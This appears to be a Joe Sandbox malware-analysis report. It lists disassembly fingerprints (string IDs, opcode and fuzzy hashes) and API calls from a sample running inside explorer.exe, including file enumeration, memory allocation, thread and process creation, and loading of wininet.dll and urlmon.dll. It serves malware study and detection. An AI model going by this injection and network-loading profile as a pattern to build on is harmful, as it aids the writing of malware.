                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: %U$($*$*$*$,$,$:-$=$AJ$A{$B5$F$I|$J$J.$Ko$M$N^$O+$P$Qe$RZ$US$US$U~$V$Y8$\.$\B$a$aj$c$d$f"$jg$m=$n'$nN$p$r$rm$sd$se$wp$z${P$~+$U$o$}
                  • API String ID: 0-2594925837
                  • Opcode ID: 56c1370482bb0434758a592cf4036955ef12aff836d9146180c4f572947434fa
                  • Instruction ID: ccd42d953ced593ce9d477f81da7b70306163e354f7a0f8011ffedbe7cc8b852
                  • Opcode Fuzzy Hash: 56c1370482bb0434758a592cf4036955ef12aff836d9146180c4f572947434fa
                  • Instruction Fuzzy Hash: 15F12AB0905769CBEB608F41C99C7CDBBB1BB45309F1085C9C55C2B281CBBA1AC9CF95
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                  • API String ID: 0-3248090998
                  • Opcode ID: d87409db08da575ef9f94e893eda0302c64385ea4a9faff98789b080908dbdc7
                  • Instruction ID: 9eeb68c82eab3a4ff5a991b78fa1ffdc1b5734e71b5b43d2c0bbc5868234c2ce
                  • Opcode Fuzzy Hash: d87409db08da575ef9f94e893eda0302c64385ea4a9faff98789b080908dbdc7
                  • Instruction Fuzzy Hash: 22910FF08052A98EDB218F55A4603DFBF71BB95204F1581E9C6AA7B203C3BE4E45DF90
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                  • API String ID: 0-1002149817
                  • Opcode ID: f92cda0865b4a4a2f9ec0963299e2a447cd4cdb7ffbc16669d3682e5a278b9ff
                  • Instruction ID: 61579a448c05701720399fbe786c0d92db57b8aacd5b0621903f84a1128be95a
                  • Opcode Fuzzy Hash: f92cda0865b4a4a2f9ec0963299e2a447cd4cdb7ffbc16669d3682e5a278b9ff
                  • Instruction Fuzzy Hash: A5C121B1D002289EEF60DFA5DD45BEEBBB8AF45304F0081E9E54CAB241D7B55A88CF51
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                  • API String ID: 0-3236418099
                  • Opcode ID: 56a5260a841ab50066585741cbd076502c521788a9ef1d173c1fb675085d7807
                  • Instruction ID: e9ad15095a198e3b571368719916fdc072b6b0efb0b2e412597d56d9960e61cf
                  • Opcode Fuzzy Hash: 56a5260a841ab50066585741cbd076502c521788a9ef1d173c1fb675085d7807
                  • Instruction Fuzzy Hash: E79136B1900218AEEB11DFA5DC81FEF77BDEF85705F0441A9E608A6140EBB56B84CF61
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 9<U$ $.$F$P$e$i$l$m$o$o$r$s$x
                  • API String ID: 0-3861998862
                  • Opcode ID: 17a8b7259305b265d7f1d5468f9049cccb04f9983133b6f4ec50c6cc3cc7c3b7
                  • Instruction ID: 8726ff447bc7f63711388c41f4e8aa752a56e7fbb5cdd6fc91d063cc95b0ee76
                  • Opcode Fuzzy Hash: 17a8b7259305b265d7f1d5468f9049cccb04f9983133b6f4ec50c6cc3cc7c3b7
                  • Instruction Fuzzy Hash: 3A6122B5D10218AAEB15DBA4CC80FEF777DBF98704F0041ADE609AA140EB7567488FA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                  • API String ID: 0-392141074
                  • Opcode ID: 5f728c733b0e2dc85ae87673849f328e2563a699bf8e0545e9f1814b8c0c463f
                  • Instruction ID: 453f91856cfd7098351793ab7277b09cced1758c3d66b08c9e1256a040d2d16c
                  • Opcode Fuzzy Hash: 5f728c733b0e2dc85ae87673849f328e2563a699bf8e0545e9f1814b8c0c463f
                  • Instruction Fuzzy Hash: FB7110B5D10218AAEB25DBA4CC80FEF777DBF94704F0441ADE609AA140EB756B488F91
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                  • API String ID: 0-2356907671
                  • Opcode ID: 5e93f0161ee8a6f575ab2ddf2d352a263050e487dfab338986ab61da2d4bce95
                  • Instruction ID: 643041bc59bb5d7a345ffbdfe74849db3edef4d92e520a4507f71d5b027be0d9
                  • Opcode Fuzzy Hash: 5e93f0161ee8a6f575ab2ddf2d352a263050e487dfab338986ab61da2d4bce95
                  • Instruction Fuzzy Hash: E18186B2C003186AEB55EBA4DC80FEF777CAFD4708F0445A9B509A6140EB756798CF61
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                  • API String ID: 0-685823316
                  • Opcode ID: 04c75007d91f3a922f4062745ca9dc2899ff9ad848a866cd048ba126901c70da
                  • Instruction ID: 9af754f4373ab54e903b9d0b259a4422d5d9538501bb157de4e081d46b41854c
                  • Opcode Fuzzy Hash: 04c75007d91f3a922f4062745ca9dc2899ff9ad848a866cd048ba126901c70da
                  • Instruction Fuzzy Hash: 053165B5D11218AEEF50DFE4CC44BEE7BF9AF44314F144259E618A6180DBB51A488BA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: :$:$:$A$I$N$P$m$s$t
                  • API String ID: 0-2304485323
                  • Opcode ID: 19f52f2ed63559ff0823a12e79b85ba9bae8c7a3f74a929e6aff5eabeec3f79c
                  • Instruction ID: 059bc50382c786e0c7ffd90bfc25bcd9ade257924974e169f52c3da58ccd6dd2
                  • Opcode Fuzzy Hash: 19f52f2ed63559ff0823a12e79b85ba9bae8c7a3f74a929e6aff5eabeec3f79c
                  • Instruction Fuzzy Hash: 2DD1F5B2900205ABEB50DFF4CC85FEEB7F9AF99304F14452DE148E6244E7B9A9448B60
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: &$'$7$8$8$G$T$U
                  • API String ID: 0-2420282021
                  • Opcode ID: 330811c4b1921a13e3cc691bccc77db00a05c7bc175002cc6bad21fc4b1ec922
                  • Instruction ID: 30ac8fdee55efbac1072944a757d7cca339957e9d1b992c3417bd03f8d025387
                  • Opcode Fuzzy Hash: 330811c4b1921a13e3cc691bccc77db00a05c7bc175002cc6bad21fc4b1ec922
                  • Instruction Fuzzy Hash: D6110B20D187CED9DB12CBBC85086AEBF715F23228F4883D994F42B2D2C2754716D7A6
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: L$S$\$a$c$e$l
                  • API String ID: 0-3322591375
                  • Opcode ID: 2ffa705ee9a86a4e2293cef324f850af3293aae637beb20f8eafdfdaf47a0939
                  • Instruction ID: 8414ff9dd9636b00f12a0624f0fe57c330a7f4f791ebc3aa9b01cca024793407
                  • Opcode Fuzzy Hash: 2ffa705ee9a86a4e2293cef324f850af3293aae637beb20f8eafdfdaf47a0939
                  • Instruction Fuzzy Hash: 0741A7B2C10218ABDB10DFA8DC89EDFB7B8EFC8714F01466AD51DA7100E77165858BD0
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: F$P$T$f$r$x
                  • API String ID: 0-2523166886
                  • Opcode ID: 0db527cb7ce4317479a97020fe2ac37a103b0ce0713c2e226cceafb71cf12d36
                  • Instruction ID: 2d727093a6bd2d58ee0f33facd3773889955d9a6a3e9c71ed70d40eaced9f017
                  • Opcode Fuzzy Hash: 0db527cb7ce4317479a97020fe2ac37a103b0ce0713c2e226cceafb71cf12d36
                  • Instruction Fuzzy Hash: D851E5B1900305ABEB35DFA8CC44FABB7BCEF85309F04466EA54956190E3B4B648CB91
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $i$l$o$u
                  • API String ID: 0-2051669658
                  • Opcode ID: b0dd282c555c1a83c84ba2e5c078469ef37165d7924aaf31d5e21a1fe97ee53c
                  • Instruction ID: e6415093a9fd8df60495a89a7018fe3cde6df38e64cc2a32a90bfc59f83f30d5
                  • Opcode Fuzzy Hash: b0dd282c555c1a83c84ba2e5c078469ef37165d7924aaf31d5e21a1fe97ee53c
                  • Instruction Fuzzy Hash: 966140B6900304AFDB24DBA4CC80FEFB7FDAB89714F104569E51AE7240E775BA408B60
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $i$l$o$u
                  • API String ID: 0-2051669658
                  • Opcode ID: 491f5406a4b95a7caba2ce3b8202b55682fa0a0dd7922e7aefe40db5253c2b79
                  • Instruction ID: 6996e7e8e0c3eea65231079981c69e352fea60a326cca58f6284c5a00573683b
                  • Opcode Fuzzy Hash: 491f5406a4b95a7caba2ce3b8202b55682fa0a0dd7922e7aefe40db5253c2b79
                  • Instruction Fuzzy Hash: 58411EB5900308AFDB20DFA5DC84FEFBBFDEB89704F104569E559A7240D774AA408B61
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $e$k$o
                  • API String ID: 0-3624523832
                  • Opcode ID: 5f581ada4a1287dc69c89a937b6d3f83bd4004308c40502e5254d295cfe069a0
                  • Instruction ID: 7a110323259d27ad752319dd651579390585a52f64e155bb5bd9ec2417fd5cf0
                  • Opcode Fuzzy Hash: 5f581ada4a1287dc69c89a937b6d3f83bd4004308c40502e5254d295cfe069a0
                  • Instruction Fuzzy Hash: 7AB119B5A00704AFDB24DFA4CC84FEFB7BDAF89704F108559F61AA7284D674AE418B50
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $e$k$o
                  • API String ID: 0-3624523832
                  • Opcode ID: 11c15306edbb66bdeeb65a9340912b30d2d697f41e23ec65fc8f0c5a4a8d3d69
                  • Instruction ID: c49ad355c2bcf156f4bcc9ab9e8693757c202ecb05096f6b43a0290b2443c96b
                  • Opcode Fuzzy Hash: 11c15306edbb66bdeeb65a9340912b30d2d697f41e23ec65fc8f0c5a4a8d3d69
                  • Instruction Fuzzy Hash: BF612FB5A00704AFDB24DFE4CC84FDFB7BDAF89704F104558A619AB244D770AA41CB50
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                  • API String ID: 0-2877786613
                  • Opcode ID: 99dbe433e699e59aea7a5b624db7a438143649fabd60635e0e258ac5d2723d6a
                  • Instruction ID: 11599cd2a60e66fb70af32a04b561cbc5d58a1c7c01736f5a82992e6b5f43e2c
                  • Opcode Fuzzy Hash: 99dbe433e699e59aea7a5b624db7a438143649fabd60635e0e258ac5d2723d6a
                  • Instruction Fuzzy Hash: 9C417BF5911118BEEB01EBE0CC42FEF7B7C9FD5608F104159FA08AA180E7B56A0587E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                  • API String ID: 0-2877786613
                  • Opcode ID: 9ed8e09ea4cfcea39ca52e4772a29887979a6c0260aee08e5b9b3fe8ed506fac
                  • Instruction ID: c39d777b04590ea0d472db4dc9bbc6b9e3434238dad6a71c74c3a95265ae7da6
                  • Opcode Fuzzy Hash: 9ed8e09ea4cfcea39ca52e4772a29887979a6c0260aee08e5b9b3fe8ed506fac
                  • Instruction Fuzzy Hash: 5D313BF5511118BAEB01EBE0CC42FEF777C9FD5609F104059FA086A180E6B56A0587E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 2$7$F$S
                  • API String ID: 0-1969315904
                  • Opcode ID: a33f054312728a104629af5554b48ecdfbfe3a7703a61088590b608583de2ebd
                  • Instruction ID: e995f3780639715a67fc0ab93278fd7f3193a0e11358871fd09ecb1d11fa5722
                  • Opcode Fuzzy Hash: a33f054312728a104629af5554b48ecdfbfe3a7703a61088590b608583de2ebd
                  • Instruction Fuzzy Hash: FD3148B1911109BBEB14DBE4DD41FEF77B8EF89318F004199F908A7240E7B5AA048BE5

                  Execution Graph

                  Execution Coverage: 2.5%
                  Dynamic/Decrypted Code Coverage: 4.3%
                  Signature Coverage: 1.6%
                  Total number of Nodes: 445
                  Total number of Limit Nodes: 70
                  APIs
                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F0C074
                  • FindNextFileW.KERNELBASE(?,00000010), ref: 02F0C0AF
                  • FindClose.KERNELBASE(?), ref: 02F0C0BA
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNext
                  • String ID:
                  • API String ID: 3541575487-0
                  APIs
                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02F17EE0
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  APIs
                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02F1802B
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  APIs
                  • NtAllocateVirtualMemory.NTDLL(02F01B9E,?,02F16E87,00000000,00000004,00003000,?,?,?,?,?,02F16E87,02F01B9E,02F19F6E,02F16E87,52F0558D), ref: 02F182FA
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFile
                  • String ID:
                  • API String ID: 4033686569-0
                  APIs
                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02F18117
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 42d4934e2a73ac71be9bef85a08a5834dfe81fb15361b39b8aa7e983e6f7964b
                  • Instruction ID: 996375723fe8f3957f06eb50848730554ff2d325a0a051c8ecf0dae74dbf4af0
                  • Opcode Fuzzy Hash: 42d4934e2a73ac71be9bef85a08a5834dfe81fb15361b39b8aa7e983e6f7964b
                  • Instruction Fuzzy Hash: 3C90022624556102E150715C944561A4015ABE0201F95C022A0814594D895589556221
                  APIs
                  • Sleep.KERNELBASE(000007D0), ref: 02F12D0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: Sleep
                  • String ID: net.dll$wininet.dll
                  • API String ID: 3472027048-1269752229
                  • Opcode ID: 55945e212629cc3f5ec54b711cb3c1cd562df3402a9fd21a58b7566d1b49521a
                  • Instruction ID: 36bb83fcba4f1e04e337f0458072b45634b832aac10fcf735427308c5ca515b7
                  • Opcode Fuzzy Hash: 55945e212629cc3f5ec54b711cb3c1cd562df3402a9fd21a58b7566d1b49521a
                  • Instruction Fuzzy Hash: E8319EB1600305BBC714DFA4CC80FE7BBB9AB88744F40852DEA5A5B285D370B640CBA4
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 02F0ED07
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: Initialize
                  • String ID: @J7<
                  • API String ID: 2538663250-2016760708
                  • Opcode ID: 037fd7493b7dff3fc44f4afd131df9020f0db340fd95d2e89f07f4e881ffed48
                  • Instruction ID: c7fc797ba60a359b2190e113dca13455e4f9feae0fd92e85a5707283fa2c19e6
                  • Opcode Fuzzy Hash: 037fd7493b7dff3fc44f4afd131df9020f0db340fd95d2e89f07f4e881ffed48
                  • Instruction Fuzzy Hash: BD3183B5A0060A9FDB00DFD8CC809EFB7B9FF88344B148559E616AB254D771EE01CBA0
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 02F0ED07
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: Initialize
                  • String ID: @J7<
                  • API String ID: 2538663250-2016760708
                  • Opcode ID: d3e803316148bb9d42140f17e9504a8d414092d1d4e8c506fffd6cf3d3404eed
                  • Instruction ID: 341d970e25b1f92ad080f82107095ce0feffdd478cd4bfc8fee6d130e182e2b6
                  • Opcode Fuzzy Hash: d3e803316148bb9d42140f17e9504a8d414092d1d4e8c506fffd6cf3d3404eed
                  • Instruction Fuzzy Hash: BC3121B5A0060A9FDB10DFD8CC809EEB7B9FF88344B108559E616AB254D775EE05CBA0
                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F04672
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0
                  • Opcode ID: ecdf7e4bdfac5a167bbb19b0b9b4d889b177d5f5ebb8bc45ee1e268a5426d72b
                  • Instruction ID: a8f2df2554d01a08ce6990588a9713d4e78c1477e030f76e50b236acdfc99b2b
                  • Opcode Fuzzy Hash: ecdf7e4bdfac5a167bbb19b0b9b4d889b177d5f5ebb8bc45ee1e268a5426d72b
                  • Instruction Fuzzy Hash: AD011EB5D0020DABDF10DBE4DD85F9DB3799B54348F004195EA0897280F671E714DB91
                  APIs
                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,02F07EA3,00000010,?,?,?,00000044,?,00000010,02F07EA3,?,?,?), ref: 02F18543
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateInternalProcess
                  • String ID:
                  • API String ID: 2186235152-0
                  • Opcode ID: 70a45c35d8941d98dc1e1da6fba7e6003c86319aac15bde987053209a937adb8
                  • Instruction ID: 35d23e5f09effb9b0b530c1d6df578a4f7b798f01a2b10b267ca85477772fb98
                  • Opcode Fuzzy Hash: 70a45c35d8941d98dc1e1da6fba7e6003c86319aac15bde987053209a937adb8
                  • Instruction Fuzzy Hash: 8F0192B2214609BBCB44DE99DC90EEB77ADAF8D754F408208BA0DE7241D630F8518BA4
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EF9755
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID:
                  • API String ID: 2422867632-0
                  • Opcode ID: 07ad68c3462a9f191ada937ddd116eef23576dc1a65bf11af259040f8dab1104
                  • Instruction ID: 52eb02e73c0391e8194a85d430c78c8cecb5bc3516a18a43e69cd3b637314062
                  • Opcode Fuzzy Hash: 07ad68c3462a9f191ada937ddd116eef23576dc1a65bf11af259040f8dab1104
                  • Instruction Fuzzy Hash: A2F06D7338020836E62076A9EC02FDBB6DDDB80BA5F140425F70CEA2C0D992B5418AE9
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EF9755
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID:
                  • API String ID: 2422867632-0
                  • Opcode ID: fd5eb24215a1857f3b6c4e3dfbb6db21f0ca3a716729c90902623604546812e7
                  • Instruction ID: 13a70cd696ad1697244c0663ccf587dc2df14aada85ff50d5001c4662e904316
                  • Opcode Fuzzy Hash: fd5eb24215a1857f3b6c4e3dfbb6db21f0ca3a716729c90902623604546812e7
                  • Instruction Fuzzy Hash: 2BF0927238020436E2307669DE02FDF76ADDB80BA0F140614F71DEB2C0DAA1B5418AE5
                  APIs
                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,74C08500,00000007,00000000,00000004,00000000,02F03EDC,000000F4,?,?,?,?,?), ref: 02F1848C
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: 90029ec0a1fe2d4b8e805dd88c2b5fb9c21bd0afa8bb0a8563cd9a31df341a19
                  • Instruction ID: eead8a0e1f568f1f4b704ea9a89e8eb73458151a7340289404273d43143c9c2a
                  • Opcode Fuzzy Hash: 90029ec0a1fe2d4b8e805dd88c2b5fb9c21bd0afa8bb0a8563cd9a31df341a19
